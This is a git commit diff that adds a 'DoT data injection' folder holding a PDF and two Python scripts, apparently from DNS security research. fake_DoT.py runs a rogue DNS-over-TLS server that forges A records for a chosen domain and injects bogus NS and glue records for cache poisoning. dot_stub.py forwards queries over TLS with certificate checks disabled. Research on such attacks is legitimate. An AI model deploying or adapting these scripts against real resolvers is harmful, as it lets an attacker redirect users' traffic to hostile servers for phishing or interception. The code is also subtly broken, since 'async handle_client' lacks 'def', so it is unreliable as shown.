diff options
Diffstat (limited to '11_dot_injection')
| -rw-r--r-- | 11_dot_injection/DoT数据注入.pdf | bin | 0 -> 187132 bytes | |||
| -rw-r--r-- | 11_dot_injection/dot_stub.py | 45 | ||||
| -rw-r--r-- | 11_dot_injection/fake_DoT.py | 63 |
3 files changed, 108 insertions, 0 deletions
diff --git a/11_dot_injection/DoT数据注入.pdf b/11_dot_injection/DoT数据注入.pdf Binary files differnew file mode 100644 index 0000000..eec7498 --- /dev/null +++ b/11_dot_injection/DoT数据注入.pdf diff --git a/11_dot_injection/dot_stub.py b/11_dot_injection/dot_stub.py new file mode 100644 index 0000000..3c35dc7 --- /dev/null +++ b/11_dot_injection/dot_stub.py @@ -0,0 +1,45 @@ +import socket +import ssl +import dns.message +import dns.query +import dns.rcode +import argparse + +parser = argparse.ArgumentParser() +parser.add_argument('-dot', '--dot', default='dns.alidns.com') +args = parser.parse_args() +print(f'DoT server: {args.dot}') +upstream_server = '47.88.31.213' + +# 创建监听socket +listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +listener.bind(('127.0.0.1', 53)) + +# 创建TLS连接 +context = ssl.create_default_context() +context.check_hostname = False +context.verify_mode = ssl.CERT_NONE +while True: + # 接收DNS请求 + data, addr = listener.recvfrom(1024) + #print(dns.message.from_wire(data)) + data = dns.message.from_wire(data) + if 'baidu' in data.question.__str__(): + # print(data) + # print(addr) + print('DNS请求:', data.question) + # # 创建TLS连接并发送DNS请求到上游服务器 + resp = dns.query.tls( + q=data, + where=upstream_server, + timeout=10, + ssl_context=context) + print('DNS响应:', resp.answer) + # with socket.create_connection((upstream_server,853)) as sock: + # with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock: + # tls_sock.sendall(data.to_wire()) + # resp = tls_sock.recv(4096) + + # 将上游服务器的响应发送回客户端 + listener.sendto(resp.to_wire(), addr) + break diff --git a/11_dot_injection/fake_DoT.py b/11_dot_injection/fake_DoT.py new file mode 100644 index 0000000..fbf5fea --- /dev/null +++ b/11_dot_injection/fake_DoT.py @@ -0,0 +1,63 @@ +import argparse +import asyncio +import ssl +import socket +import dns.asyncquery +import dns.message +import dns.rcode +import dns.flags +import dns.message +import dns.rrset +from dnslib import DNSRecord + +async handle_client(reader, writer): + request_data = await reader.read(1024) + request = dns.message.from_wire(request_data[2:]) + #print(request) + dns_request = dns.message.make_query(request.question[0].name, request.question[0].rdtype) + dns_request.id = request.id + #print(dns_request) + dns_response = await dns.asyncquery.udp(q=dns_request, port=53, where='223.5.5.5') + #print(dns_response) + if str(request.question[0].name) == tamper and int(request.question[0].rdtype) == 1: + print('---tamper---', tamper) + dns_response.answer = [dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '39.106.44.126')] + if str(request.question[0].name) == inject: + print('---inject---', inject) + dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]), + dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)] + #print(dns_response) + + response_data = dns_response + record_header = len(response_data.to_wire()).to_bytes(2, 'big') + # 构建完整的TLS响应数据 + tls_response_data = record_header + response_data.to_wire() + writer.write(tls_response_data) + await writer.drain() + writer.close() + +async start_server(): + # 配置服务器参数 + listen_address = '0.0.0.0' + listen_port = 853 + CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt" # 替换为你的SSL证书文件路径 + KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key" # 替换为你的SSL密钥文件路径 + context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH) + context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE) + # 创建TCP服务器 + server = await asyncio.start_server( + handle_client, listen_address, listen_port, ssl=context) + + print(f'DoT server listening on {listen_address}:{listen_port}') + async with server: + await server.serve_forever() + +parser = argparse.ArgumentParser() +parser.add_argument('-tamper', '--tamper', default='') +parser.add_argument('-inject', '--inject', default='') +parser.add_argument('-ns', '--ns', default='39.106.44.126') +args = parser.parse_args() +tamper = args.tamper +'.' +inject = args.inject +'.' +ns = args.ns +asyncio.run(start_server())
\ No newline at end of file |